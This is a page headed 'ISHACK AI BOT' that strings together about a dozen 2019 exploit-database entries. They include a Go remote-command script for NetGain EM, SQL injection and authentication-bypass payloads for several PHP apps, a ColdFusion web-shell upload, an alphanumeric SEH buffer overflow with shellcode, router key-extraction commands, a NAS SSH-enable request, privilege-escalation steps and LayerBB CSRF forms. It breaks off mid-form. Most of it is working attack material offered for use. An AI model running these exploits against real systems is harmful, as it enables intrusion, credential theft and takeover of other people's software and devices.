ISHACK AI BOT

/******************************************************************************** # Exploit Title: NetGain EM Plus <= v10.1.68 - Unauthorized Local File Inclusion # Date: 15 September 2019 # Exploit Author: azams / @TheRealAzams # Vendor Homepage: http://netgain-systems.com # Software Link: http://www.netgain-systems.com/free/ # Version: v10.1.68 # Tested on: Linux # # Install golang: https://golang.org/doc/install # Compile exploit: go build exploit.go # Run exploit without compiling: go run exploit.go # Shouts: Rix, Channisa, Ridho7ul & Horangi! *********************************************************************************/ package main import ( "crypto/tls" "fmt" "io/ioutil" "net/http" "net/url" "os" "strings" ) var ( target string port string cmd string ) func main() { for i := range os.Args { if os.Args[i] == "-u" { target = os.Args[i+1] } else if os.Args[i] == "-p" { port = os.Args[i+1] } else if os.Args[i] == "-cmd" { cmd = os.Args[i+1] } } if target != "" || port != "" || cmd != "" { cmd = "type=sh&content=%232Fbin%2Fsh%0Aecho+'0xdeadnoob'%0a" + cmd + "%0aecho+'0xdeadnoob'&args=&count=0&ip=localhost" status, body := exploit() if strings.Contains(status, "200") { fmt.Println("Status Code: " + status) result := strings.Split(body, "0xdeadnoob") fmt.Println("Result: \n" + strings.Trim(result[1], "\n")) return } fmt.Println("Exploit failed!") } else { fmt.Println("Usage: ./exploit -u http://127.0.0.1 -p 8181 -cmd 'id;'") } } func exploit() (string, string) { tbTransport := &http.Transport{TLSClientConfig: &tls.Config{InsecureSkipVerify: true}} client := &http.Client{Transport: tbTransport} datas, err := url.ParseQuery(cmd) req, err := http.NewRequest("POST", target+":"+port+"/u/jsp/designer/script_test.jsp", strings.NewReader(datas.Encode())) req.Header.Set("Content-type", "application/x-www-form-urlencoded") resp, err := client.Do(req) if err != nil { panic(err) } defer resp.Body.Close() body, _ := ioutil.ReadAll(resp.Body) return resp.Status, string(body) }

# Exploit Title: College-Management-System 1.2 - Authentication Bypass # Author: Cakes # Discovery Date: 2019-09-14 # Vendor Homepage: https://github.com/ajinkyabodade/College-Management-System # Software Link: https://github.com/ajinkyabodade/College-Management-System/archive/master.zip # Tested Version: 1.2 # Tested on OS: CentOS 7 # CVE: N/A # Discription: # Easy authentication bypass vulnerability on the application # allowing the attacker to log in as the school principal. # Simply replay the below Burp request or use Curl. # Payload: ' or 0=0 # POST /college/principalcheck.php HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://TARGET/college/principalcheck.php Content-Type: application/x-www-form-urlencoded Content-Length: 36 Cookie: PHPSESSID=9bcu5lvfilimmvfnkinqlc61l9; Logmon=ca43r5mknahus9nu20jl9qca0q Connection: close Upgrade-Insecure-Requests: 1 DNT: 1 emailid='%20or%200%3d0%20#&pass=asdf

#-----------------------------------------------------------------------------# # Exploit Title: AppXSvc - Arbitrary File Security Descriptor Overwrite (EoP) # # Date: Sep 4 2019 # # Exploit Author: Gabor Seljan # # Vendor Homepage: https://www.microsoft.com/ # # Version: 17763.1.amd64fre.rs5_release.180914-1434 # # Tested on: Windows 10 Version 1809 for x64-based Systems # # CVE: CVE-2019-1253 # #-----------------------------------------------------------------------------# Summary: AppXSvc improperly handles file hard links resulting in a low privileged user being able to take 'Full Control' of an arbitrary file leading to elevation of privilege. Description: An elevation of privilege vulnerability exists when the AppX Deployment Server (AppXSvc) improperly handles file hard links. While researching CVE-2019-0841 originally reported by Nabeel Ahmed, I have found that AppXSvc sometimes opens the settings.dat[.LOGx] files of Microsoft Edge for a restore operation that modifies the security descriptor of the files. Further analyzis revealed that the restore operation can be triggered on demand by preventing AppXSvc from accessing the settings.dat[.LOGx] files. This can be achieved by locking the settings.dat[.LOGx] file, resulting in 'Access Denied' and 'Sharing Violation' errors when Edge and AppXSvc are trying to access it. Eventually the restore operation kicks in and if the settings.dat[.LOGx] file has been replaced with a hard link AppXSvc will overwrite the security descriptor of the target file. A low privileged user can leverage this vulnerability to take 'Full Control' of an arbitrary file. Steps to reproduce: 1. Terminate Edge. 2. Create a hard link from settings.dat.LOG2 to C:\Windows\win.ini. 3. Open the hard link for reading and lock the file. 4. Start Edge and wait a few seconds for the restore operation to kick in. 5. Unlock the file and close the file handle. Expected result: Full access (GENERIC_ALL) to C:\Windows\win.ini is denied. Observed result: C:\Windows\win.ini has had it's security descriptor rewritten to grant 'Full Control' to the low privileged user. PoC files: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47389.zip References: https://github.com/sgabe/CVE-2019-1253 https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1253 https://krbtgt.pw/dacl-permissions-overwrite-privilege-escalation-cve-2019-0841

# Exploit Title: Inteno IOPSYS Gateway 3DES Key Extraction - Improper Access Restrictions # Date: 2019-06-29 # Exploit Author: Gerard Fuguet ([email protected]) # Vendor Homepage: https://www.intenogroup.com/ # Version: EG200-WU7P1U_ADAMO3.16.4-190226_1650 # Fixed Version: EG200-WU7P1U_ADAMO3.16.8-190820_0937 # Affected Component: SIP password, Info Gathering of Network Config # Attack Type: Remote # Tested on: Kali Linux 2019.2 against an Inteno EG200 Router # CVE : CVE-2019-13140 # Description: Inteno EG200 EG200-WU7P1U_ADAMO3.16.4-190226_1650 and before firmwares routers have a JUCI ACL misconfiguration that allows the "user" account to extract the 3DES key via JSON commands to ubus. The 3DES key is used to decrypt the provisioning file provided by Adamo Telecom on a public URL via cleartext HTTP. # Attack Vectors: To get success on the exploitation, two components are mandatory: 1. the encrypted file (.enc) and 2. The 3DES key for decrypt it. The encrypted file can be downloaded via HTTP URL offered by Adamo ISP (works from any external network). Then is need to interact with the router using WebSocket protocol to obtain the 3DES key, a web browser like Firefox can be used as WebSocket client under the developer tools. Session id is acquired with the same username and password of the router (in this case, password is the same as wifi defaults). Once 3DES key is obtained through a JSON request command, .enc file can be decrypted with the help of openssl tool. # PoC: Step 1: Getting the provisioning file Download from http://inteno-provisioning.adamo.es/XXXXXXXXXXXX.enc Where XXXXXXXXXXXX is your router’s Inteno MAC, all in capitals and without the colons. You can also get your MAC by doing a ping to the router and then an arp command on terminal. Step 2: The 3DES Key Let's communcatie by Sockets - Using Firefox, open the router’s webpage (192.168.1.1 by default). - Invoke the developer tools by pressing F12 and go to the Console Tab. - Let’s create the WebSocket: var superSocket = new WebSocket("ws://192.168.1.1/", "ubus-json") - And creating the Log for show responses in each petition: superSocket.onmessage = function (event) {console.log(event.data)} - We request an ID session with the same login parameters that when access to the router’s website. (put your wifis router password instead of wifis-password value): superSocket.send(JSON.stringify({"jsonrpc":"2.0","method":"call","params":["00000000000000000000000000000000","session","login",{"username":"user","password":"wifis-password"}],"id":666})) - Now, you will obtain a response, the value of the parameter that says “ubus_rpc_session” refers to your session’s ID, copy it to use in the next request call. - Requesting information about the router’s System. (put your session ID instead of put-your-session-id-here value): superSocket.send(JSON.stringify({"jsonrpc":"2.0","method":"call","params":["put-your-session-id-here","router.system","info",{}],"id":999})) - On the response obtained, copy the value of the “des” parameter. It’s 16 digits that we need convert to hexadecimal. Step 3: Ready for Decrypting Convert to HEX using xxd tool where XXXXXXXXXXXXXXXX is your "des" key: echo -n XXXXXXXXXXXXXXXX | xxd -p - Use openssl tool to decrypt your provisioning file. (Put your "des" key instead of your-des-key-in-hex-format value and the XXXXXXXXXXXX refers the name of your encryption provisioning file, in the -out value, the name can be different): openssl enc -d -des-ede -nosalt -K your-des-key-in-hex-format -in XXXXXXXXXXXX.enc -out XXXXXXXXXXXX.tar.gz - Uncompress the decrypted file: tar -xzvf XXXXXXXXXXXX.tar.gz - You get the file: Provisioning.conf. - Showing the file: cat Provisioning.conf - The end of the line refers to the secret, the password of your SIP account. A video was created to show all these Steps in action: https://youtu.be/uObz1uE5P4s # Additional Information: A packet sniffer like Wireshark can be used for retrieve the 3DES key instead of using WebSocket communication protocol. In that case, user needs to do the login on the router's page, and then the JSON request containing the 3DES key will be catched. # References: https://twitter.com/GerardFuguet/status/1169298861782896642 https://www.slideshare.net/fuguet/call-your-key-to-phone-all # Timeline: 2019-06-29 - White Paper done 2019-07-01 - CVE assigned 2019-07-09 - Notified to Inteno 2019-07-11 - Adamo aware and ask for detailed info 2019-07-12 - Info facilitated 2019-07-25 - Early patch available and applied (Cooperation starts) 2019-07-26 - Tested and failed (VoIP not working) 2019-08-27 - New firmware available 2019-08-30 - Firmware EG200-WU7P1U_ADAMO3.16.8-190820_0937 applied on router 2019-08-31 - Tested OK 2019-09-04 - Disclosure published

===========Security Intelligence============ # Vendor Homepage: adobe.com # Version: 2018 # Tested on: Adobe ColdFusion 2018 # Exploit Author: Pankaj Kumar Thakur (Nepal) ==========[Table of Contents]============== * Overview * Detailed description * Thanks & Acknowledgements * References ==========[Vulnerability Information]======== * Unrestricted file upload in Adobe ColdFusion 2018 * CWE-434 * Base Score: 6.8 MEDIUM * Vector: AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H =========[ Overview]========================= * System Affected: Adobe ColdFusion 2018 * Impact: Unrestricted file upload =====[ Detailed description]================= Unrestricted file upload vulnerability in the Symantec Advanced Secure Gateway (ASG) and ProxySG management consoles. A malicious appliance administrator can upload arbitrary malicious files to the management console and trick another administrator user into downloading and executing malicious code. Request POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm HTTP/1.1 Host: hostname:portno User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:65.0) Gecko/20100101 Firefox/65.0 Content-Type: multipart/form-data; Content-Length: 303 Connection: close Upgrade-Insecure-Requests: 1 . . -----------------------------24464570528145 Content-Disposition: form-data; name="file"; filename="shell_file with extension" Content-Type: image/jpeg shell code -----------------------------24464570528145 Content-Disposition: form-data; name="path" . . After uploading shell, its located here http://coldfusion:port/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/shell_file with extension =====[ Thanks & Acknowledgements]======================================== * Acknowledged by Adobe * Duplicate * https://nvd.nist.gov/vuln/detail/CVE-2016-10258 * https://www.cvedetails.com/cve/CVE-2016-1713/ * https://www.openwall.com/lists/oss-security/2016/01/12/4 =====[ EOF ]===========================================================

import struct # Title: docPrint Pro v8.0 'User/Master Password' Local SEH Alphanumeric Encoded Buffer Overflow # Date: September 14th, 2019 # Author: Connor McGarr (@33y0re) (https://connormcgarr.github.io) # Vendor Homepage: http://www.verypdf.com # Software Link: http://dl.verypdf.net/docprint_pro_setup.exe # Version: 8.0 # Tested on: Windows 10 and Windows 7 # TO RUN: # 1. Create a blank file named "test.pdf" # 2. Open doc2pdf_win.exe # 3. When the application loads, go to Settings > PDF Security > and check "Encrypt PDF File" # 4. Run this python script. Copy the contents and paste it into the "User Password" and "Master Password" fields and press "okay" # 5. Click "Add File(s)" # 6. Select the "test.pdf" file created from step 1. # 7. Press on "Start" and name the file "exploit.pdf" # Unusual bad characters include: \x01\x05\x07\x08\x09 (and the usual suspects that are not ASCII) # Zero out registers for calculations. zero = "\x25\x01\x01\x01\x01" zero += "\x25\x10\x10\x10\x10" # Stack alignment alignment = "\x54" # push esp alignment += "\x58" # pop eax alignment += "\x2d\x1a\x50\x55\x55" # sub eax, 0x1a505555 alignment += "\x2d\x1a\x4e\x55\x55" # sub eax, 0x1a4e5555 alignment += "\x2d\x1a\x4e\x55\x55" # sub eax, 0x1a4e5555 alignment += "\x50" # push eax alignment += "\x5c" # pop esp # Custom created and encoded MessageBox POC shellcode. # Utilized aplication DLL with no ASLR for Windows API call to MessageBox function. # \x31\xc0\x50\x68 # \x42\x41\x4a\x41 # \x89\xe1\x50\x68 # \x42\x41\x4a\x41 # \x89\xe2\x50\x50 # \x51\x52\x50\xbe # \x38\x20\x00\x10 # \xff\xe6\x41\x41 # 534F1555 534F0255 53500157 (bit of byte mangling after jmp esi, but works nonetheless!) shellcode = zero # zero out eax shellcode += "\x2d\x55\x15\x4f\x53" # sub eax, 0x534f1555 shellcode += "\x2d\x55\x02\x4f\x53" # sub eax, 0x534f0255 shellcode += "\x2d\x57\x01\x50\x53" # sub eax, 0x53500157 shellcode += "\x50" # push eax # 4F554A42 4F554A42 51554B44 shellcode += zero # zero out eax shellcode += "\x2d\x42\x4a\x55\x4f" # sub eax, 0x4f554a42 shellcode += "\x2d\x42\x4a\x55\x4f" # sub eax, 0x4f554a42 shellcode += "\x2d\x44\x4b\x55\x51" # sub eax, 0x51554b44 shellcode += "\x50" # push eax # 153A393A 153A393A 173B3B3B shellcode += zero shellcode += "\x2d\x3a\x39\x3a\x15" # sub eax, 0x173b3b3b shellcode += "\x2d\x3a\x39\x3a\x15" # sub eax, 0x153a393a shellcode += "\x2d\x3b\x3b\x3b\x17" # sub eax, 0x173b3b3b shellcode += "\x50" # push eax # 3A3A1927 3A3A0227 3B3B0229 shellcode += zero # zero out eax shellcode += "\x2d\x27\x19\x3a\x3a" # sub eax, 0x3a3a1927 shellcode += "\x2d\x27\x02\x3a\x3a" # sub eax, 0x3a3a0227 shellcode += "\x2d\x29\x02\x3b\x3b" # sub eax, 0x3b3b0229 shellcode += "\x50" # push eax # 3F3C3F3F 3F3C3F3F 403D4040 shellcode += zero # zero out eax shellcode += "\x2d\x3f\x3f\x3c\x3f" # sub eax, 0x3f3c3f3f shellcode += "\x2d\x3f\x3f\x3c\x3f" # sub eax, 0x3f3c3f3f shellcode += "\x2d\x40\x40\x3d\x40" # sub eax, 0x403d4040 shellcode += "\x50" # push eax # 323A1A27 323A0227 333B0229 shellcode += zero # zero out eax shellcode += "\x2d\x27\x1a\x3a\x32" # sub eax, 0x323a1a27 shellcode += "\x2d\x27\x02\x3a\x32" # sub eax, 0x323a0227 shellcode += "\x2d\x29\x02\x3b\x33" # sub eax, 0x333b0229 shellcode += "\x50" # push eax # 3F3C3F3F 3F3C3F3F 403D4040 shellcode += zero # zero out eax shellcode += "\x2d\x3f\x3f\x3c\x3f" # sub eax, 0x3f3c3f3f shellcode += "\x2d\x3f\x3f\x3c\x3f" # sub eax, 0x3f3c3f3f shellcode += "\x2d\x40\x40\x3d\x40" # sub eax, 0x403d4040 shellcode += "\x50" # push eax # 323A1545 323A1545 333B1545 shellcode += zero # zero out eax shellcode += "\x2d\x45\x15\x3a\x32" # sub eax, 0x323a1545 shellcode += "\x2d\x45\x15\x3A\x32" # sub eax, 0x323a1545 shellcode += "\x2d\x45\x15\x3b\x33" # sub eax, 0x333b1545 shellcode += "\x50" # push eax # Let's roll. payload = "\x41" * 1676 payload += "\x70\x06\x71\x06" # JO 6 bytes. If fails, JNO 6 bytes payload += struct.pack('<L', 0x10011874) # pop ebp pop ebx ret reg.dll payload += "\x41" * 2 # Padding to reach alignment payload += alignment payload += shellcode payload += "\x45" * (6000-len(payload)) # Write to file f = open('bajablast.txt', 'w') f.write(payload) f.close()

# Exploit Title: Notepad++ all x64 versions before 7.7. Remote memory corruption via .ml file. # Google Dork: N/A # Date: 2019-09-14 # Exploit Author: Bogdan Kurinnoy ([email protected]) # Vendor Homepage: https://notepad-plus-plus.org/ # Version: < 7.7 # Tested on: Windows x64 # CVE : CVE-2019-16294 # Description: SciLexer.dll in Scintilla in Notepad++ (x64) before 7.7 allows remote code execution or denial of service via Unicode characters in a crafted .ml file. Open aaaaa.ml via affected notepad++ POC files: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47393.zip Result: (230.c64): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Notepad++\SciLexer.dll - rax=00007ff8e64014c0 rbx=00000000000aaaaa rcx=00000000000aaaaa rdx=0000000000000003 rsi=0000000000000000 rdi=00000000ffffffff rip=00007ff8e63c071d rsp=000000aa06463d60 rbp=000000aa06463e81 r8=0000000000002fc8 r9=0000000000000000 r10=000000000000fde9 r11=000000aa06463d90 r12=0000000000000000 r13=0000000000000000 r14=0000000000000001 r15=0000000000000002 iopl=0 nv up ei pl zr na po nc cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246 SciLexer!Scintilla_DirectFunction+0x950dd: 00007ff8e63c071d 0fb70458 movzx eax,word ptr [rax+rbx*2] ds:00007ff8e6556a14=????

# Exploit Title: CollegeManagementSystem-CMS 1.3 - 'batch' SQL Injection # Author: Cakes # Discovery Date: 2019-09-16 # Vendor Homepage: https://github.com/SaloniKumari123/CollegeManagementSystem # Software Link: https://github.com/SaloniKumari123/CollegeManagementSystem/archive/master.zip # Tested Version: 1.3 # Tested on OS: CentOS 7 # CVE: N/A # Description: # Another College Management system coded in PHP, most input values accounted for and sanitized, except this one :-) # Parameter: batch (GET) # Type: boolean-based blind # Title: OR boolean-based blind - WHERE or HAVING clause Payload: batch=-9643' OR 9247=9247-- aqgq # Type: time-based blind # Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: batch=2021' AND (SELECT 6451 FROM (SELECT(SLEEP(5)))CWMt)-- zEfe # Type: UNION query # Title: Generic UNION query (NULL) - 3 columns Payload: batch=2021' UNION ALL SELECT NULL,CONCAT(0x71786a6271,0x564f6e51546c6f634741454d714e5777716d427361504d7a794b686c50657472724d616f49674b51,0x7171627171),NULL-- pPUb

# Exploit Title: Hospital-Management 1.26 - 'fname' SQL Injection # Author: Cakes # Discovery Date: 2019-09-18 # Vendor Homepage: https://github.com/Mugerwa-Joseph/hospital-management # Software Link: https://github.com/Mugerwa-Joseph/hospital-management/archive/master.zip # Tested Version: 1.26 # Tested on OS: CentOS 7 # CVE: N/A # Discription: # Simple SQL injection after application authentication. # Type: boolean-based blind # Title: AND boolean-based blind - WHERE or HAVING clause # Payload: fname=tester'||(SELECT 0x72516679 FROM DUAL WHERE 9119=9119 AND 1379=1379)||'&sname=tester&[email protected]&phone=1123456783&address=123 happy lane&gender=Male&bloodgroup=B&birthyear=2002&btn=Add # Type: error-based # Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) # Payload: fname=tester'||(SELECT 0x53495778 FROM DUAL WHERE 5761=5761 AND (SELECT 9648 FROM(SELECT COUNT(*),CONCAT(0x71787a7a71,(SELECT (ELT(9648=9648,1))),0x716b786b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))||'&sname=tester&[email protected]&phone=1123456783&address=123 happy lane&gender=Male&bloodgroup=B&birthyear=2002&btn=Add # Type: time-based blind # Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) # Payload: fname=tester'||(SELECT 0x5144494b FROM DUAL WHERE 1043=1043 AND (SELECT 1880 FROM (SELECT(SLEEP(5)))AmmF))||'&sname=tester&[email protected]&phone=1123456783&address=123 happy lane&gender=Male&bloodgroup=B&birthyear=2002&btn=Add

# Exploit Title: Western Digital My Book World II NAS <= 1.02.12 - Broken Authentication to RCE # Google Dork: intitle:"My Book World Edition - MyBookWorld" # Date: 19th Sep, 2019 # Exploit Author: Noman Riffat, National Security Services Group (NSSG) # Vendor Homepage: https://wd.com/ # Software Link: https://support.wdc.com/downloads.aspx?p=130&lang=en # Version: <= 1.02.12 # Tested on: Firmware # CVE : CVE-2019-16399 POST /admin/system_advanced.php?lang=en HTTP/1.1 Host: x.x.x.x User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:69.0) Gecko/20100101 Firefox/69.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Upgrade-Insecure-Requests: 1 Content-Length: 241 orig_ssl_key=&orig_ssl_certificate=&submit_type=ssh&current_ssh=&enablessh=yes&Submit=Submit&ssl_certificate=Paste+a+signed+certificate+in+X.509+PEM+format+here.&ssl_key=Paste+a+RSA+private+key+in+PEM+format+here.&hddstandby=on&ledcontrol=on /* The default password for SSH is 'welc0me' and the only security measure preventing SSH Login is the disabled SSH Port and it can be enabled with above POST Header. The attacker can then login to SSH Port with default password. WD My Book World II NAS is very outdated hardware and Western Digitial may never release update for it. It is still using PHP 4 so it has more potential of Remote Exploits. All firmwares listed at https://support.wdc.com/downloads.aspx?p=130&lang=en are vulnerable. There is no update coming probably and if you want to remain safe, abandon this NAS and switch to the latest hardware. */ Security Researcher - Noman Riffat, National Security Services Group (NSSG) @nomanriffat, @nssgoman

# macOS-Kernel-Exploit ## DISCLAIMER You need to know the KASLR slide to use the exploit. Also SMAP needs to be disabled which means that it's not exploitable on Macs after 2015. These limitations make the exploit pretty much unusable for in-the-wild exploitation but still helpful for security researchers in a controlled lab environment. This exploit is intended for security research purposes only. ## General macOS Kernel Exploit for CVE-????-???? (currently a 0day. I'll add the CVE# once it is published ;) ). Thanks to @LinusHenze for this cool bug and his support ;P. ## Writeup Probably coming soon. If you want to try and exploit it yourself, here are a few things to get you started: - VM: Download the macOS installer from the appstore and drag the `.app` file into VMWare's `NEW VM` window - Kernel Debugging setup: http://ddeville.me/2015/08/using-the-vmware-fusion-gdb-stub-for-kernel-debugging-with-lldb - Have a look at the _kernel_trap function ## Build I recommend setting the bootargs to: `debug=0x44 kcsuffix=development -v ` :warning: **Note**: SMAP needs to be disabled on macs after 2015 (`-pmap_smap_disable`) You will need XCODE <= 9.4.1 to build the exploit. (It needs to be 32bit) Downloading Xcode 9.4.1 Commandline Tools should be enough ;) Download: https://developer.apple.com/download/more/ ``` make ``` ## Execution ``` ./exploit <KASLR slide> ``` Tested on macOS Mojave: `Darwin Kernel-Mac.local 18.7.0 Darwin Kernel Version 18.7.0: Thu Jun 20 18:42:21 PDT 2019; root:xnu-4903.270.47~4/DEVELOPMENT_X86_64 x86_64` **Demo**: [](https://asciinema.org/a/UBmByRiRR0y5USBwuHKC5X7GU) - - - EDB Note: Download ~ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47400.zip

# Exploit Title: DIGIT CENTRIS 4 ERP - 'datum1' SQL Injection # Date: 2019-09-19 # Exploit Author: n1x_ [MS-WEB] # Vendor Homepage: http://www.digit-rs.com/ # Product Homepage: http://digit-rs.com/centris.html # Version: Every version # CVE : N/A # Vulnerable parameters: datum1, datum2, KID, PID # [POST REQUEST] POST /korisnikinfo.php HTTP/1.1 Content-Length: 65 Content-Type: application/x-www-form-urlencoded Referer: http://host Host: host Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21 Accept: */* ListaPDF=Lista%20u%20PDF&datum1=1'"&datum2=01.01.2001'"&KID=1'"&PID=1'"

# Exploit Title: LayerBB 1.1.3 - Multiple CSRF # Date: 4/7/2019 # Author: 0xB9 # Twitter: @0xB9Sec # Contact: 0xB9[at]pm.me # Software Link: https://forum.layerbb.com/downloads.php?view=file&id=30 # Version: 1.1.3 # Tested on: Ubuntu 18.04 # CVE: CVE-2019-16531 1. Description: LayerBB is a free open-source forum software, multiple CSRF vulnerabilities were found such as editing user profiles and forums. 2. Proof of Concepts: <!-- Edit Usergroup CSRF --> <form action="http://localhost/admin/edit_usergroup.php/id/1" method="POST" style="padding: 25px;"> <label for="g_name">Name</label> <input type="text" name="g_name" id="g_name" value="User" class="form-control"> <label for="g_style">Style <small><code>%username%</code> will be replaced with the user's username.</small></label> <textarea name="g_style" id="g_style" class="form-control"><span>%username%</span></textarea> <label for="b_style_s">Banner Style Start</label> <textarea name="b_style_s" id="b_style_s" class="form-control"><span class="label label -default"></textarea> <label for="b_style_e">Banner Style End</label> <textarea name="b_style_e" id="b_style_e" class="form-control"></span></textarea> <label for="permissions">Permissions</label><br> <input type="checkbox" name="permissions[]" value="1" checked=""> view_forum<br><input type="checkbox" name="permissions[]" value="2" checked=""> create_thread<br><input type="checkbox" name="permissions[]" value="3" checked=""> reply_thread<br><input type="checkbox" name="permissions[]" value="4"> access_moderation<br><input type="checkbox" name="permissions[]" value="5"> access_administration<br> <br> <input type="checkbox" name="is_staff" value="1"> This Usergroup is staff. <br> <input type="submit" name="update" value="Save Changes" class="btn btn-default"> </form> <!-- Edit Usergroup CSRF End --> <!-- Edit User CSRF --> <form action="http://localhost/admin/edit_user.php/id/1" method="POST" style="padding: 25px;"> <label for="username">Username</label> <input type="text" name="username" id="username" value="Administrator" class="form-control"> <label for="email">Email Address</label> <input type="text" name="email" id="email" value="[email protected]" class="form-control"> <label for="usermsg">User Message</label> <input type="text" name="usermsg" id="usermsg" value="User" class="form-control"> <label for="signature">User Signature</label> <textarea id="editor" name="signature" class="form-control" style="min-height:250px;"></textarea> <label for="disabled">User Activated</label><br> <input type="radio" name="disabled" value="0" checked=""> Do Not Change<br> <input type="radio" name="disabled" value="0"> Active<br> <input type="radio" name="disabled" value="1"> Disabled<br> <br> <label for="usergroup">Usergroup</label><br> <select name="usergroup" id="usergroup" style="width:100%;"> <option value="4" selected="">Dont Change</option> <option value="1">User</option><option value="2">Banned</option><option value="3">Moderator</option><option value="4">Administrator</option> </select><br><br> <input type="submit" name="update" value="Save Changes" class="btn btn-default"> </form> <!-- Edit User CSRF End --> <!-- Edit Category CSRF --> <form action="http://localhost/admin/edit_category.php/id/1" method="POST" style="padding: 25px;"> <label for="cat_title">Title</label> <input type="text" name="cat_title" id="cat_title" value="First Category" class="form-control"> <label for="cat_desc">Description</label> <textarea name="cat_desc" id="cat_desc" class="form-control">First category on this forum!</textarea> <br> <label for="allowed_usergroups">Allowed Usergroups</label><br> <input type="checkbox" name="allowed_ug[]" value="0" checked=""> Guest<br><input type="checkbox" name="allowed_ug[]" value="1" checked=""> User<br><input type="checkbox" name="allowed_ug[]" value="2"> Banned<br><input type="checkbox" name="allowed_ug[]" value="3" checked=""> Moderator<br><input type="checkbox" name="allowed_ug[]" value="4" checked=""> Administrator<br> <br> <input type="submit" name="update" value="Save Changes" class="btn btn-default"> </form> <!-- Edit Category CSRF End --> <!-- Edit Node CSRF --> <form action="http://localhost/admin/edit_node.php/id/1" method="POST" style="padding: 25px;"> <label for="cat_title">Title</label> <input type="text" name="node_title" id="cat_title" value="First Node" class="form-control"> <label for="cat_desc">Description</label> <textarea name="node_desc" id="cat_desc" class="form-control">The first node on this forum</textarea> <label for="parent">Parent</label><br> <select name="node_parent" id="parent" style="width:100%;"> <option value="1" selected="">First Category</option> </select> <br> <label for="additional_option">Additional Options</label><br> <input type="checkbox" name="lock_node" value="1" id="lock_node"> <label style="font-weight: normal;" for="lock_node">Lock Node</label> <br> <label for="allowed_usergroups">Allowed Usergroups</label><br> <input type="checkbox" name="allowed_ug[]" value="0" checked=""> Guest<br><input type="checkbox" name="allowed_ug[]" value="1" checked=""> User<br><input type="checkbox" name="allowed_ug[]" value="2"> Banned<br><input type="checkbox" name="allowed_ug[]" value="3" checked=""> Moderator<br><input type="checkbox" name="allowed_ug[]" value="4" checked=""> Administrator<br> <label for="labels">Labels</label> <small>Each Line is a new label. HTML enabled.</small> <textarea name="labels" id="labels" class="form-control"></textarea><br> <input type="submit" name="update" value="Save Changes" class="btn btn-default"> </form> <!-- Edit Node CSRF End --> <!-- System Settings CSRF --> <form action="http://localhost/admin/general.php" enctype="multipart/form-data" method="POST"><section class="col-lg-12"> <div class="box box-success"> <div class="box-header"> <div class="tab-content" style="padding: 25px;"> <br> <label for="site_name">Board Name</label> <input type="text" class="form-control" name="site_name" id="site_name" value="LayerBB Demo"> <label for="board_email">Board Email</label> <input type="text" class="form-control" name="board_email" id="board_email" value="[email protected]"> <label for="number_subs">Number of shown subforums</label> <input type="text" class="form-control" name="number_subs" id="number_subs" value="3"> <input type="checkbox" name="register_enable" value="1" id="reg_enable" checked=""> <label for="reg_enable">Enable Registeration</label><br> <input type="checkbox" name="post_merge" value="1" id="post_merge" checked=""> <label for="post_merge">Merge Posts (<a href="#" title="Merge consecutive posts by the same user." id="tooltip">?</a>)</label><br> <input type="checkbox" name="site_enable" value="1" id="site_enable" checked=""> <label for="site_enable">Forum Enabled (<a href="#" title="Allows you to enable or disable your forums." id="tooltip">?</a>)</label><br> <input type="checkbox" name="email_verify" value="1" id="email_verify"> <label for="email_verify">Email Verification (<a href="#" title="Allows you to enable or disable email verification." id="tooltip">?</a>)</label><br> <input type="checkbox" name="enable_signatures" value="1" id="enable_signatures" checked=""> <label for="enable_signatures">Allow user signatures (<a href="#" title="Allows you to disable user signatures." id="tooltip">?</a>)</label><br> <input type="checkbox" name="enable_pcomments" value="1" id="enable_pcomments" checked=""> <label for="enable_pcomments">Enable Profile Comments (<a href="#" title="Allows you to disable profile comments." id="tooltip">?</a>)</label><br> <br> <label for="default_language">Default Languge</label><br> <select name="default_language" id="Default_language" class="form-control"> <option value="english" selected="">English</option> </select><br> <input type="checkbox" name="enable_rtl" value="1" id="enable_rtl"> <label for="enable_rtl">Enable RTL (<a href="#" title="Enable Right-to-left for languages that need RTL" id="tooltip">?</a>)</label><br><br> <label for="board_rules">Board Rules</label> <span id="helpBlock" class="help-block">HTML tags will be converted into ascii codes. Hyperlinks are not supported!</span> <textarea name="board_rules" class="form-control" style="min-height:250px;">- No spamming.</textarea> <br> <label for="offline_msg">Offline Message</label> <span id="helpBlock" class="help-block">HTML tags will be converted into ascii codes.</span> <textarea name="offline_msg" class="form-control" style="min-height:250px;"></textarea> <br> <label for="rcap_public">reCaptcha Public Key</label> <input type="text" name="rcap_public" id="rcap_public" class="form-control" value="0"> <label for="rcap_private">reCaptcha Private Key</label> <input type="text" name="rcap_private" id="rcap_private" class="form-control" value="0"> <input type="checkbox" name="enable_recaptcha" value="1"> Use reCaptcha<br> <br> <label for="content">Board Signature</label> <textarea id="editor" name="board_signature" class="form-control" 